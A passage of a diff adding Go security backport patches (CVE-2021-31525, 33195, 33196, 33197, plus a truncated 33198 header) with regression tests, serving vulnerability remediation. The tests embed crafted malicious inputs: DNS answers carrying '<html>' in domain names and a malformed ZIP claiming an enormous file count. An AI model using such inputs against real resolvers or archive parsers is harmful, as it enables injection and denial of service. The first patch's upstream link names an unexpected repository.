index 0000000000..afe4b0d2b8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
@@ -0,0 +1,38 @@
1From efb465ada003d23353a91ef930be408eb575dba6 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 16 Jun 2022 17:40:12 +0530
4Subject: [PATCH] CVE-2021-31525
5
6Upstream-Status: Backport [https://github.com/argoheyard/lang-net/commit/701957006ef151feb43f86aa99c8a1f474f69282]
7CVE: CVE-2021-31525
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10---
11 src/vendor/golang.org/x/net/http/httpguts/httplex.go | 10 ++++++----
12 1 file changed, 6 insertions(+), 4 deletions(-)
13
14diff --git a/src/vendor/golang.org/x/net/http/httpguts/httplex.go b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
15index e7de24e..c79aa73 100644
16--- a/src/vendor/golang.org/x/net/http/httpguts/httplex.go
17+++ b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
18@@ -137,11 +137,13 @@ func trimOWS(x string) string {
19 // contains token amongst its comma-separated tokens, ASCII
20 // case-insensitively.
21 func headerValueContainsToken(v string, token string) bool {
22- v = trimOWS(v)
23- if comma := strings.IndexByte(v, ','); comma != -1 {
24- return tokenEqual(trimOWS(v[:comma]), token) || headerValueContainsToken(v[comma+1:], token)
25+ for comma := strings.IndexByte(v, ','); comma != -1; comma = strings.IndexByte(v, ',') {
26+ if tokenEqual(trimOWS(v[:comma]), token) {
27+ return true
28+ }
29+ v = v[comma+1:]
30 }
31- return tokenEqual(v, token)
32+ return tokenEqual(trimOWS(v), token)
33 }
34
35 // lowerASCII returns the ASCII lowercase version of b.
36--
372.25.1
38
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
new file mode 100644
index 0000000000..3d9de888ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
@@ -0,0 +1,373 @@
1From 9324d7e53151e9dfa4b25af994a28c2e0b11f729 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Thu, 27 May 2021 10:40:06 -0700
4Subject: [PATCH] net: verify results from Lookup* are valid domain names
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/31d60cda1f58b7558fc5725d2b9e4531655d980e]
7CVE: CVE-2021-33195
8Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
9
10
11For the methods LookupCNAME, LookupSRV, LookupMX, LookupNS, and
12LookupAddr check that the returned domain names are in fact valid DNS
13names using the existing isDomainName function.
14
15Thanks to Philipp Jeitner and Haya Shulman from Fraunhofer SIT for
16reporting this issue.
17
18Updates #46241
19Fixes #46356
20Fixes CVE-2021-33195
21
22Change-Id: I47a4f58c031cb752f732e88bbdae7f819f0af4f3
23Reviewed-on: https://go-review.googlesource.com/c/go/+/323131
24Trust: Roland Shoemaker <roland@golang.org>
25Run-TryBot: Roland Shoemaker <roland@golang.org>
26TryBot-Result: Go Bot <gobot@golang.org>
27Reviewed-by: Filippo Valsorda <filippo@golang.org>
28Reviewed-by: Katie Hockman <katie@golang.org>
29(cherry picked from commit cdcd02842da7c004efd023881e3719105209c908)
30Reviewed-on: https://go-review.googlesource.com/c/go/+/323269
31---
32 src/net/dnsclient_unix_test.go | 157 +++++++++++++++++++++++++++++++++
33 src/net/lookup.go | 111 ++++++++++++++++++++---
34 2 files changed, 255 insertions(+), 13 deletions(-)
35
36diff --git a/src/net/dnsclient_unix_test.go b/src/net/dnsclient_unix_test.go
37index 2ad40df..b8617d9 100644
38--- a/src/net/dnsclient_unix_test.go
39+++ b/src/net/dnsclient_unix_test.go
40@@ -1800,3 +1800,160 @@ func TestPTRandNonPTR(t *testing.T) {
41 t.Errorf("names = %q; want %q", names, want)
42 }
43 }
44+
45+func TestCVE202133195(t *testing.T) {
46+ fake := fakeDNSServer{
47+ rh: func(n, _ string, q dnsmessage.Message, _ time.Time) (dnsmessage.Message, error) {
48+ r := dnsmessage.Message{
49+ Header: dnsmessage.Header{
50+ ID: q.Header.ID,
51+ Response: true,
52+ RCode: dnsmessage.RCodeSuccess,
53+ RecursionAvailable: true,
54+ },
55+ Questions: q.Questions,
56+ }
57+ switch q.Questions[0].Type {
58+ case dnsmessage.TypeCNAME:
59+ r.Answers = []dnsmessage.Resource{}
60+ case dnsmessage.TypeA: // CNAME lookup uses a A/AAAA as a proxy
61+ r.Answers = append(r.Answers,
62+ dnsmessage.Resource{
63+ Header: dnsmessage.ResourceHeader{
64+ Name: dnsmessage.MustNewName("<html>.golang.org."),
65+ Type: dnsmessage.TypeA,
66+ Class: dnsmessage.ClassINET,
67+ Length: 4,
68+ },
69+ Body: &dnsmessage.AResource{
70+ A: TestAddr,
71+ },
72+ },
73+ )
74+ case dnsmessage.TypeSRV:
75+ n := q.Questions[0].Name
76+ if n.String() == "_hdr._tcp.golang.org." {
77+ n = dnsmessage.MustNewName("<html>.golang.org.")
78+ }
79+ r.Answers = append(r.Answers,
80+ dnsmessage.Resource{
81+ Header: dnsmessage.ResourceHeader{
82+ Name: n,
83+ Type: dnsmessage.TypeSRV,
84+ Class: dnsmessage.ClassINET,
85+ Length: 4,
86+ },
87+ Body: &dnsmessage.SRVResource{
88+ Target: dnsmessage.MustNewName("<html>.golang.org."),
89+ },
90+ },
91+ )
92+ case dnsmessage.TypeMX:
93+ r.Answers = append(r.Answers,
94+ dnsmessage.Resource{
95+ Header: dnsmessage.ResourceHeader{
96+ Name: dnsmessage.MustNewName("<html>.golang.org."),
97+ Type: dnsmessage.TypeMX,
98+ Class: dnsmessage.ClassINET,
99+ Length: 4,
100+ },
101+ Body: &dnsmessage.MXResource{
102+ MX: dnsmessage.MustNewName("<html>.golang.org."),
103+ },
104+ },
105+ )
106+ case dnsmessage.TypeNS:
107+ r.Answers = append(r.Answers,
108+ dnsmessage.Resource{
109+ Header: dnsmessage.ResourceHeader{
110+ Name: dnsmessage.MustNewName("<html>.golang.org."),
111+ Type: dnsmessage.TypeNS,
112+ Class: dnsmessage.ClassINET,
113+ Length: 4,
114+ },
115+ Body: &dnsmessage.NSResource{
116+ NS: dnsmessage.MustNewName("<html>.golang.org."),
117+ },
118+ },
119+ )
120+ case dnsmessage.TypePTR:
121+ r.Answers = append(r.Answers,
122+ dnsmessage.Resource{
123+ Header: dnsmessage.ResourceHeader{
124+ Name: dnsmessage.MustNewName("<html>.golang.org."),
125+ Type: dnsmessage.TypePTR,
126+ Class: dnsmessage.ClassINET,
127+ Length: 4,
128+ },
129+ Body: &dnsmessage.PTRResource{
130+ PTR: dnsmessage.MustNewName("<html>.golang.org."),
131+ },
132+ },
133+ )
134+ }
135+ return r, nil
136+ },
137+ }
138+
139+ r := Resolver{PreferGo: true, Dial: fake.DialContext}
140+ // Change the default resolver to match our manipulated resolver
141+ originalDefault := DefaultResolver
142+ DefaultResolver = &r
143+ defer func() {
144+ DefaultResolver = originalDefault
145+ }()
146+
147+ _, err := r.LookupCNAME(context.Background(), "golang.org")
148+ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
149+ t.Errorf("Resolver.LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
150+ }
151+ _, err = LookupCNAME("golang.org")
152+ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
153+ t.Errorf("LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
154+ }
155+
156+ _, _, err = r.LookupSRV(context.Background(), "target", "tcp", "golang.org")
157+ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
158+ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
159+ }
160+ _, _, err = LookupSRV("target", "tcp", "golang.org")
161+ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
162+ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
163+ }
164+
165+ _, _, err = r.LookupSRV(context.Background(), "hdr", "tcp", "golang.org")
166+ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
167+ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
168+ }
169+ _, _, err = LookupSRV("hdr", "tcp", "golang.org")
170+ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
171+ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
172+ }
173+
174+ _, err = r.LookupMX(context.Background(), "golang.org")
175+ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
176+ t.Errorf("Resolver.LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
177+ }
178+ _, err = LookupMX("golang.org")
179+ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
180+ t.Errorf("LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
181+ }
182+
183+ _, err = r.LookupNS(context.Background(), "golang.org")
184+ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
185+ t.Errorf("Resolver.LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
186+ }
187+ _, err = LookupNS("golang.org")
188+ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
189+ t.Errorf("LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
190+ }
191+
192+ _, err = r.LookupAddr(context.Background(), "1.2.3.4")
193+ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
194+ t.Errorf("Resolver.LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
195+ }
196+ _, err = LookupAddr("1.2.3.4")
197+ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
198+ t.Errorf("LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
199+ }
200+}
201diff --git a/src/net/lookup.go b/src/net/lookup.go
202index 9cebd10..05e88e4 100644
203--- a/src/net/lookup.go
204+++ b/src/net/lookup.go
205@@ -364,8 +364,11 @@ func (r *Resolver) LookupPort(ctx context.Context, network, service string) (por
206 // LookupCNAME does not return an error if host does not
207 // contain DNS "CNAME" records, as long as host resolves to
208 // address records.
209+//
210+// The returned canonical name is validated to be a properly
211+// formatted presentation-format domain name.
212 func LookupCNAME(host string) (cname string, err error) {
213- return DefaultResolver.lookupCNAME(context.Background(), host)
214+ return DefaultResolver.LookupCNAME(context.Background(), host)
215 }
216
217 // LookupCNAME returns the canonical name for the given host.
218@@ -378,8 +381,18 @@ func LookupCNAME(host string) (cname string, err error) {
219 // LookupCNAME does not return an error if host does not
220 // contain DNS "CNAME" records, as long as host resolves to
221 // address records.
222-func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string, err error) {
223- return r.lookupCNAME(ctx, host)
224+//
225+// The returned canonical name is validated to be a properly
226+// formatted presentation-format domain name.
227+func (r *Resolver) LookupCNAME(ctx context.Context, host string) (string, error) {
228+ cname, err := r.lookupCNAME(ctx, host)
229+ if err != nil {
230+ return "", err
231+ }
232+ if !isDomainName(cname) {
233+ return "", &DNSError{Err: "CNAME target is invalid", Name: host}
234+ }
235+ return cname, nil
236 }
237
238 // LookupSRV tries to resolve an SRV query of the given service,
239@@ -391,8 +404,11 @@ func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string,
240 // That is, it looks up _service._proto.name. To accommodate services
241 // publishing SRV records under non-standard names, if both service
242 // and proto are empty strings, LookupSRV looks up name directly.
243+//
244+// The returned service names are validated to be properly
245+// formatted presentation-format domain names.
246 func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err error) {
247- return DefaultResolver.lookupSRV(context.Background(), service, proto, name)
248+ return DefaultResolver.LookupSRV(context.Background(), service, proto, name)
249 }
250
251 // LookupSRV tries to resolve an SRV query of the given service,
252@@ -404,28 +420,82 @@ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err err
253 // That is, it looks up _service._proto.name. To accommodate services
254 // publishing SRV records under non-standard names, if both service
255 // and proto are empty strings, LookupSRV looks up name directly.
256-func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (cname string, addrs []*SRV, err error) {
257- return r.lookupSRV(ctx, service, proto, name)
258+//
259+// The returned service names are validated to be properly
260+// formatted presentation-format domain names.
261+func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (string, []*SRV, error) {
262+ cname, addrs, err := r.lookupSRV(ctx, service, proto, name)
263+ if err != nil {
264+ return "", nil, err
265+ }
266+ if cname != "" && !isDomainName(cname) {
267+ return "", nil, &DNSError{Err: "SRV header name is invalid", Name: name}
268+ }
269+ for _, addr := range addrs {
270+ if addr == nil {
271+ continue
272+ }
273+ if !isDomainName(addr.Target) {
274+ return "", nil, &DNSError{Err: "SRV target is invalid", Name: name}
275+ }
276+ }
277+ return cname, addrs, nil
278 }
279
280 // LookupMX returns the DNS MX records for the given domain name sorted by preference.
281+//
282+// The returned mail server names are validated to be properly
283+// formatted presentation-format domain names.
284 func LookupMX(name string) ([]*MX, error) {
285- return DefaultResolver.lookupMX(context.Background(), name)
286+ return DefaultResolver.LookupMX(context.Background(), name)
287 }
288
289 // LookupMX returns the DNS MX records for the given domain name sorted by preference.
290+//
291+// The returned mail server names are validated to be properly
292+// formatted presentation-format domain names.
293 func (r *Resolver) LookupMX(ctx context.Context, name string) ([]*MX, error) {
294- return r.lookupMX(ctx, name)
295+ records, err := r.lookupMX(ctx, name)
296+ if err != nil {
297+ return nil, err
298+ }
299+ for _, mx := range records {
300+ if mx == nil {
301+ continue
302+ }
303+ if !isDomainName(mx.Host) {
304+ return nil, &DNSError{Err: "MX target is invalid", Name: name}
305+ }
306+ }
307+ return records, nil
308 }
309
310 // LookupNS returns the DNS NS records for the given domain name.
311+//
312+// The returned name server names are validated to be properly
313+// formatted presentation-format domain names.
314 func LookupNS(name string) ([]*NS, error) {
315- return DefaultResolver.lookupNS(context.Background(), name)
316+ return DefaultResolver.LookupNS(context.Background(), name)
317 }
318
319 // LookupNS returns the DNS NS records for the given domain name.
320+//
321+// The returned name server names are validated to be properly
322+// formatted presentation-format domain names.
323 func (r *Resolver) LookupNS(ctx context.Context, name string) ([]*NS, error) {
324- return r.lookupNS(ctx, name)
325+ records, err := r.lookupNS(ctx, name)
326+ if err != nil {
327+ return nil, err
328+ }
329+ for _, ns := range records {
330+ if ns == nil {
331+ continue
332+ }
333+ if !isDomainName(ns.Host) {
334+ return nil, &DNSError{Err: "NS target is invalid", Name: name}
335+ }
336+ }
337+ return records, nil
338 }
339
340 // LookupTXT returns the DNS TXT records for the given domain name.
341@@ -441,14 +511,29 @@ func (r *Resolver) LookupTXT(ctx context.Context, name string) ([]string, error)
342 // LookupAddr performs a reverse lookup for the given address, returning a list
343 // of names mapping to that address.
344 //
345+// The returned names are validated to be properly formatted presentation-format
346+// domain names.
347+//
348 // When using the host C library resolver, at most one result will be
349 // returned. To bypass the host resolver, use a custom Resolver.
350 func LookupAddr(addr string) (names []string, err error) {
351- return DefaultResolver.lookupAddr(context.Background(), addr)
352+ return DefaultResolver.LookupAddr(context.Background(), addr)
353 }
354
355 // LookupAddr performs a reverse lookup for the given address, returning a list
356 // of names mapping to that address.
357-func (r *Resolver) LookupAddr(ctx context.Context, addr string) (names []string, err error) {
358- return r.lookupAddr(ctx, addr)
359+//
360+// The returned names are validated to be properly formatted presentation-format
361+// domain names.
362+func (r *Resolver) LookupAddr(ctx context.Context, addr string) ([]string, error) {
363+ names, err := r.lookupAddr(ctx, addr)
364+ if err != nil {
365+ return nil, err
366+ }
367+ for _, name := range names {
368+ if !isDomainName(name) {
369+ return nil, &DNSError{Err: "PTR target is invalid", Name: addr}
370+ }
371+ }
372+ return names, nil
373 }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
new file mode 100644
index 0000000000..2e2dc62c49
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
@@ -0,0 +1,124 @@
1From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Tue, 11 May 2021 11:31:31 -0700
4Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized
5
6Since the number of files in the EOCD record isn't validated, it isn't
7safe to preallocate Reader.Files using that field. A malformed archive
8can indicate it contains up to 1 << 128 - 1 files. We can still safely
9preallocate the slice by checking if the specified number of files in
10the archive is reasonable, given the size of the archive.
11
12Thanks to the OSS-Fuzz project for discovering this issue and to
13Emmanuel Odeke for reporting it.
14
15Fixes #46242
16Fixes CVE-2021-33196
17
18Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76
19Reviewed-on: https://go-review.googlesource.com/c/go/+/318909
20Trust: Roland Shoemaker <roland@golang.org>
21Trust: Katie Hockman <katie@golang.org>
22Trust: Joe Tsai <thebrokentoaster@gmail.com>
23Run-TryBot: Roland Shoemaker <roland@golang.org>
24TryBot-Result: Go Bot <gobot@golang.org>
25Reviewed-by: Katie Hockman <katie@golang.org>
26Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com>
27
28Upstream-Status: Backport
29CVE: CVE-2021-33196
30Signed-off-by: Armin Kuster <akuster@mvista.com>
31
32---
33 src/archive/zip/reader.go | 10 +++++-
34 src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++
35 2 files changed, 68 insertions(+), 1 deletion(-)
36
37Index: go/src/archive/zip/reader.go
38===================================================================
39--- go.orig/src/archive/zip/reader.go
40+++ go/src/archive/zip/reader.go
41@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz
42 return err
43 }
44 z.r = r
45- z.File = make([]*File, 0, end.directoryRecords)
46+ // Since the number of directory records is not validated, it is not
47+ // safe to preallocate z.File without first checking that the specified
48+ // number of files is reasonable, since a malformed archive may
49+ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
50+ // header which will be _at least_ 30 bytes we can safely preallocate
51+ // if (data size / 30) >= end.directoryRecords.
52+ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
53+ z.File = make([]*File, 0, end.directoryRecords)
54+ }
55 z.Comment = end.comment
56 rs := io.NewSectionReader(r, 0, size)
57 if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil {
58Index: go/src/archive/zip/reader_test.go
59===================================================================
60--- go.orig/src/archive/zip/reader_test.go
61+++ go/src/archive/zip/reader_test.go
62@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) {
63 t.Errorf("Error reading the archive: %v", err)
64 }
65 }
66+
67+func TestCVE202133196(t *testing.T) {
68+ // Archive that indicates it has 1 << 128 -1 files,
69+ // this would previously cause a panic due to attempting
70+ // to allocate a slice with 1 << 128 -1 elements.
71+ data := []byte{
72+ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08,
73+ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
74+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
75+ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02,
76+ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00,
77+ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20,
78+ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00,
79+ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00,
80+ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00,
81+ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00,
82+ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00,
83+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
84+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
85+ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c,
86+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d,
87+ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
88+ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
89+ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
90+ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00,
91+ 0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
92+ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00,
93+ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00,
94+ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50,
95+ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff,
96+ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
97+ 0xff, 0xff, 0xff, 0x00, 0x00,
98+ }
99+ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
100+ if err != ErrFormat {
101+ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
102+ }
103+
104+ // Also check that an archive containing a handful of empty
105+ // files doesn't cause an issue
106+ b := bytes.NewBuffer(nil)
107+ w := NewWriter(b)
108+ for i := 0; i < 5; i++ {
109+ _, err := w.Create("")
110+ if err != nil {
111+ t.Fatalf("Writer.Create failed: %s", err)
112+ }
113+ }
114+ if err := w.Close(); err != nil {
115+ t.Fatalf("Writer.Close failed: %s", err)
116+ }
117+ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len()))
118+ if err != nil {
119+ t.Fatalf("NewReader failed: %s", err)
120+ }
121+ if len(r.File) != 5 {
122+ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
123+ }
124+}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
new file mode 100644
index 0000000000..2052b1d3db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
@@ -0,0 +1,152 @@
1From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Fri, 21 May 2021 14:02:30 -0400
4Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove
5 hop-by-hop headers
6
7Previously, we'd fail to remove the Connection header from a request
8like this:
9
10 Connection:
11 Connection: x-header
12
13Updates #46313
14Fixes #46314
15Fixes CVE-2021-33197
16
17Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d
18Reviewed-on: https://go-review.googlesource.com/c/go/+/321929
19Run-TryBot: Filippo Valsorda <filippo@golang.org>
20Reviewed-by: Katie Hockman <katie@golang.org>
21Trust: Katie Hockman <katie@golang.org>
22Trust: Filippo Valsorda <filippo@golang.org>
23TryBot-Result: Go Bot <gobot@golang.org>
24Reviewed-on: https://go-review.googlesource.com/c/go/+/323091
25Run-TryBot: Katie Hockman <katie@golang.org>
26
27Upstream-Status: Backport
28CVE: CVE-2021-33197
29Signed-off-by: Armin Kuster <akuster@mvista.com>
30
31---
32 src/net/http/httputil/reverseproxy.go | 22 ++++----
33 src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++-
34 2 files changed, 70 insertions(+), 15 deletions(-)
35
36Index: go/src/net/http/httputil/reverseproxy.go
37===================================================================
38--- go.orig/src/net/http/httputil/reverseproxy.go
39+++ go/src/net/http/httputil/reverseproxy.go
40@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http
41 // important is "Connection" because we want a persistent
42 // connection, regardless of what the client sent to us.
43 for _, h := range hopHeaders {
44- hv := outreq.Header.Get(h)
45- if hv == "" {
46- continue
47- }
48- if h == "Te" && hv == "trailers" {
49- // Issue 21096: tell backend applications that
50- // care about trailer support that we support
51- // trailers. (We do, but we don't go out of
52- // our way to advertise that unless the
53- // incoming client request thought it was
54- // worth mentioning)
55- continue
56- }
57 outreq.Header.Del(h)
58 }
59
60+ // Issue 21096: tell backend applications that care about trailer support
61+ // that we support trailers. (We do, but we don't go out of our way to
62+ // advertise that unless the incoming client request thought it was worth
63+ // mentioning.) Note that we look at req.Header, not outreq.Header, since
64+ // the latter has passed through removeConnectionHeaders.
65+ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") {
66+ outreq.Header.Set("Te", "trailers")
67+ }
68+
69 // After stripping all the hop-by-hop connection headers above, add back any
70 // necessary for protocol upgrades, such as for websockets.
71 if reqUpType != "" {
72Index: go/src/net/http/httputil/reverseproxy_test.go
73===================================================================
74--- go.orig/src/net/http/httputil/reverseproxy_test.go
75+++ go/src/net/http/httputil/reverseproxy_test.go
76@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) {
77
78 getReq, _ := http.NewRequest("GET", frontend.URL, nil)
79 getReq.Host = "some-name"
80- getReq.Header.Set("Connection", "close")
81- getReq.Header.Set("Te", "trailers")
82+ getReq.Header.Set("Connection", "close, TE")
83+ getReq.Header.Add("Te", "foo")
84+ getReq.Header.Add("Te", "bar, trailers")
85 getReq.Header.Set("Proxy-Connection", "should be deleted")
86 getReq.Header.Set("Upgrade", "foo")
87 getReq.Close = true
88@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent
89 }
90 }
91
92+func TestReverseProxyStripEmptyConnection(t *testing.T) {
93+ // See Issue 46313.
94+ const backendResponse = "I am the backend"
95+
96+ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header
97+ // in the Request's Connection header.
98+ const someConnHeader = "X-Some-Conn-Header"
99+
100+ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
101+ if c := r.Header.Values("Connection"); len(c) != 0 {
102+ t.Errorf("handler got header %q = %v; want empty", "Connection", c)
103+ }
104+ if c := r.Header.Get(someConnHeader); c != "" {
105+ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
106+ }
107+ w.Header().Add("Connection", "")
108+ w.Header().Add("Connection", someConnHeader)
109+ w.Header().Set(someConnHeader, "should be deleted")
110+ io.WriteString(w, backendResponse)
111+ }))
112+ defer backend.Close()
113+ backendURL, err := url.Parse(backend.URL)
114+ if err != nil {
115+ t.Fatal(err)
116+ }
117+ proxyHandler := NewSingleHostReverseProxy(backendURL)
118+ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
119+ proxyHandler.ServeHTTP(w, r)
120+ if c := r.Header.Get(someConnHeader); c != "should be deleted" {
121+ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted")
122+ }
123+ }))
124+ defer frontend.Close()
125+
126+ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
127+ getReq.Header.Add("Connection", "")
128+ getReq.Header.Add("Connection", someConnHeader)
129+ getReq.Header.Set(someConnHeader, "should be deleted")
130+ res, err := frontend.Client().Do(getReq)
131+ if err != nil {
132+ t.Fatalf("Get: %v", err)
133+ }
134+ defer res.Body.Close()
135+ bodyBytes, err := ioutil.ReadAll(res.Body)
136+ if err != nil {
137+ t.Fatalf("reading body: %v", err)
138+ }
139+ if got, want := string(bodyBytes), backendResponse; got != want {
140+ t.Errorf("got body %q; want %q", got, want)
141+ }
142+ if c := res.Header.Get("Connection"); c != "" {
143+ t.Errorf("handler got header %q = %q; want empty", "Connection", c)
144+ }
145+ if c := res.Header.Get(someConnHeader); c != "" {
146+ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
147+ }
148+}
149+
150 func TestXForwardedFor(t *testing.T) {
151 const prevForwardedFor = "client ip"
152 const backendResponse = "I am the backend"
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
new file mode 100644
index 0000000000..241c08dad7
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
@@ -0,0 +1,113 @@
1From c8866491ac424cdf39aedb325e6dec9e54418cfb Mon Sep 17 00:00:00 2001
2From: Robert Griesemer <gri@golang.org>
3Date: Sun, 2 May 2021 11:27:03 -0700
4Subject: [PATCH] math/big: check for excessive exponents in Rat.SetString
5
6CVE-2021-33198
7
8Upstream-Status: Backport [https://github.com/golang/go/commit/df9ce19db6df32d94eae8760927bdfbc595433c3]
9CVE: CVE-2021-33198
10Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
11
12
13Found by OSS-Fuzz https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33284
14
15Thanks to Emmanuel Odeke for reporting this issue.
16
17Updates #45910
18Fixes #46305
19Fixes CVE-2021-33198
20
21Change-Id: I61e7b04dbd80343420b57eede439e361c0f7b79c
22Reviewed-on: https://go-review.googlesource.com/c/go/+/316149
23Trust: Robert Griesemer <gri@golang.org>
24Trust: Katie Hockman <katie@golang.org>
25Run-TryBot: Robert Griesemer <gri@golang.org>
26TryBot-Result: Go Bot <gobot@golang.org>
27Reviewed-by: Katie Hockman <katie@golang.org>
28Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
29(cherry picked from commit 6c591f79b0b5327549bd4e94970f7a279efb4ab0)
30Reviewed-on: https://go-review.googlesource.com/c/go/+/321831
31Run-TryBot: Katie Hockman <katie@golang.org>
32Reviewed-by: Roland Shoemaker <roland@golang.org>
33---
34 src/math/big/ratconv.go | 15 ++++++++-------
